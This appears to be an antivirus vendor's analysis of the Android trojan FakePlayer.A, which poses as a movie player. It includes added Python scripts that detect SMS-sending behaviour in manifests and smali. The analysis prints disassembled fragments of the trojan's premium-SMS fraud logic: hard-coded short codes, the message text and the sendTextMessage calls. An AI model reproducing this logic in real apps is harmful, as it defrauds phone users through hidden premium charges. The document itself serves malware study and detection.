Mobile Virus

Android/FakePlayer.A!tr

Analysis

This trojan affects mobile phones running on the Android platform.
The trojan poses as a movie player aimed at Russian users. In reality, the malware sends 3 SMS messages to two Russian premium-rate numbers.


Technical Details


The trojan installs on the mobile phone under the name "Movie Player".
During installation, the phone warns the end user that the application is capable of sending SMS messages (an unsuspecting end user may still choose to install it):

Figure 1. Installation warning

After installation, the trojan's "Movie Player" icon appears in the application panel:

Figure 2. The trojan is installed

Launching the malware for the first time displays a message in Russian:


Figure 3. Russian message translated by Google

While this message is displayed, the trojan sends the SMS messages.
The malicious sample is distributed as an Android application package file (.apk extension).
This package contains the core application code (classes.dex), the resources (icon, strings, ...), the corresponding manifests and the signature files holding hashes of these entries, as listed below:
res/drawable/icon.png
res/layout/main.xml
res/values/strings.xml
res/values/public.xml
META-INF/MANIFEST.MF
META-INF/CERT.RSA
META-INF/CERT.SF
classes.dex
resources.arsc
AndroidManifest.xml

The core "classes.dex" is a Dalvik Executable. The .dex is executed by Android's virtual machine (Dalvik), which uses its own bytecode. The bytecode may be disassembled:
.class public Lorg/me/androidapplication1/MoviePlayer;
.super Landroid/app/Activity;
.source "MoviePlayer.java"


# direct methods
.method public constructor <init>()V
    .locals 0

    .prologue
    .line 22
    invoke-direct {p0}, Landroid/app/Activity;-><init>()V

    return-void
.end method

Additionally, the XML manifest shows the "entry point" of the malware: it is the MoviePlayer class. See below:
    <activity android:label="Movie Player" android:name=".MoviePlayer">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
    </activity>
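
Identifying the launcher entry point and the declared permissions is the first triage step on any APK, and it can be scripted. The following Python is an added example and not part of the original analysis: it parses a decoded (text-form) manifest built around the activity above. The package name org.me.androidapplication1 comes from the sample's class path; the SEND_SMS permission line and the second, non-launcher activity are assumptions added to exercise the checks.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample: a decoded (text-form) manifest built around the activity
# shown in the analysis. The package name comes from the sample's class path;
# the SEND_SMS permission line and the ".HelloActivity" entry are assumptions
# for the example. A real APK stores AndroidManifest.xml as binary XML, so
# decode it with apktool or aapt before feeding it to this parser.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.me.androidapplication1">
    <uses-permission android:name="android.permission.SEND_SMS" />
    <application android:label="Movie Player">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".HelloActivity" />
    </application>
</manifest>
"""


def android_attr(name):
    """Qualified attribute name for android:<name>, as ElementTree stores it."""
    return "{%s}%s" % (ANDROID_NS, name)


def triage_manifest(xml_text):
    """Extract what an analyst checks first: declared permissions and the
    launcher entry point(s), i.e. activities whose intent-filter carries both
    the MAIN action and the LAUNCHER category."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    permissions = sorted(p.get(android_attr("name"), "")
                         for p in root.iter("uses-permission"))
    entry_points = []
    for activity in root.iter("activity"):
        for flt in activity.findall("intent-filter"):
            actions = {a.get(android_attr("name")) for a in flt.findall("action")}
            categories = {c.get(android_attr("name")) for c in flt.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in categories):
                name = activity.get(android_attr("name"), "")
                # A leading dot means "relative to the package name".
                entry_points.append(package + name if name.startswith(".") else name)
    return {
        "package": package,
        "permissions": permissions,
        "entry_points": entry_points,
        "can_send_sms": "android.permission.SEND_SMS" in permissions,
    }


if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print("%-12s %s" % (key, value))
```

The entry point resolved here (org.me.androidapplication1.MoviePlayer) is the class whose disassembly is examined next; the SEND_SMS permission is what produces the install-time warning shown in Figure 1.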
The class reveals that the malicious behavior is effective only once: the trojan checks a database entry via a routine called "canwe" and sets a flag. If the flag is already set, the trojan does not send any SMS.
    .line 29
    .local v6, dh:Lorg/me/androidapplication1/DataHelper;
    invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;->canwe()Z
    move-result v2

    if-eqz v2, :cond_0

The malware sends SMS messages to two Russian premium-rate numbers. One of those numbers is used twice.
    .line 54
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 55
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 57
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
...
    .line 63
    :goto_0
    const-string v1, "3354"
...
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
...
    const-string v1, "3353"
...
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_2
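
The pattern above (a literal short code loaded with const-string into the register that becomes the destinationAddress argument of SmsManager.sendTextMessage) is what an analyst looks for when triaging a suspected SMS trojan, and it can be found automatically in baksmali output. The following Python is an added example, not code from the original analysis: it tracks const-string loads per register within a method and reports the destination and text at each sendTextMessage call. The embedded smali is a constructed, condensed version of the disassembly above with the elided parts filled in by ordinary register setup; the method name "sendsms" is an assumption for the example.

```python
import re

# Constructed sample: a condensed smali method in the shape of the disassembly
# shown in the analysis (same registers, short codes and invoke form). The
# method name "sendsms" is an assumption, not a name taken from the sample.
SAMPLE_SMALI = """\
.method private sendsms()V
    .locals 6
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0
    const-string v1, "3353"
    const-string v3, "798657"
    const/4 v2, 0x0
    const/4 v4, 0x0
    const/4 v5, 0x0
    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :goto_0
    const-string v1, "3354"
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    const-string v1, "3353"
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    return-void
.end method
"""

# const-string (or const-string/jumbo) loading a literal into a v or p register
CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+([vp]\d+),\s*"((?:[^"\\]|\\.)*)"')
# invoke-virtual or invoke-virtual/range on SmsManager.sendTextMessage
SMS_SINK = re.compile(r'^\s*invoke-virtual(?:/range)?\s+\{([^}]*)\},\s*'
                      r'Landroid/telephony/SmsManager;->sendTextMessage\(')


def parse_registers(spec):
    """Expand a smali register list ("v0 .. v5" or "v0, v1, v2") in order."""
    spec = spec.strip()
    m = re.match(r'^([vp])(\d+)\s*\.\.\s*[vp](\d+)$', spec)
    if m:
        prefix, lo, hi = m.group(1), int(m.group(2)), int(m.group(3))
        return ["%s%d" % (prefix, i) for i in range(lo, hi + 1)]
    return [r.strip() for r in spec.split(",") if r.strip()]


def find_sms_sinks(smali_text):
    """Return (destination, text) for each sendTextMessage call whose arguments
    were loaded by const-string earlier in the same method. The argument order
    is {this, destinationAddress, scAddress, text, sentIntent, deliveryIntent},
    so the destination is the 2nd register and the message body the 4th."""
    sinks = []
    regs = {}
    for line in smali_text.splitlines():
        if line.strip().startswith(".method"):
            regs = {}  # register contents do not carry over between methods
            continue
        m = CONST_STRING.match(line)
        if m:
            regs[m.group(1)] = m.group(2)
            continue
        m = SMS_SINK.match(line)
        if m:
            args = parse_registers(m.group(1))
            dest = regs.get(args[1], "<unresolved>") if len(args) > 1 else "<unresolved>"
            text = regs.get(args[3], "<unresolved>") if len(args) > 3 else "<unresolved>"
            sinks.append((dest, text))
    return sinks


def hardcoded_short_codes(sinks):
    """Distinct destinations that are literal numeric short codes (3 to 6
    digits): the indicator that separates premium-rate senders from apps that
    send to a user-supplied number."""
    return sorted({d for d, _ in sinks if d.isdigit() and 3 <= len(d) <= 6})


if __name__ == "__main__":
    sinks = find_sms_sinks(SAMPLE_SMALI)
    for dest, text in sinks:
        print("sendTextMessage -> %s : %r" % (dest, text))
    print("hard-coded short codes:", hardcoded_short_codes(sinks))
```

Run over the constructed sample it reports three sends, two of them to "3353" and one to "3354", matching the "one number used twice" observation above. Destinations that are built at runtime rather than loaded with const-string come back as "<unresolved>", which is itself worth a manual look.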

Also, the malware author probably built this malware on top of the "HelloWorld" template from the Android SDK. The hint comes from the "main.xml" file of the layout resources:
<?xml version="1.0" encoding="UTF-8"?>
<LinearLayout android:orientation="vertical"
              android:layout_width="fill_parent"
              android:layout_height="fill_parent"
              xmlns:android="http://schemas.android.com/apk/res/android">
    <TextView android:layout_width="fill_parent"
              android:layout_height="wrap_content"
              android:text="Hello Android from NetBeans" />
</LinearLayout>

The corresponding class is never called; it was probably used to test the SMS-sending methods. We also found a different Russian message that translates to "Click OK to access the video library".

Recommended Action

FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.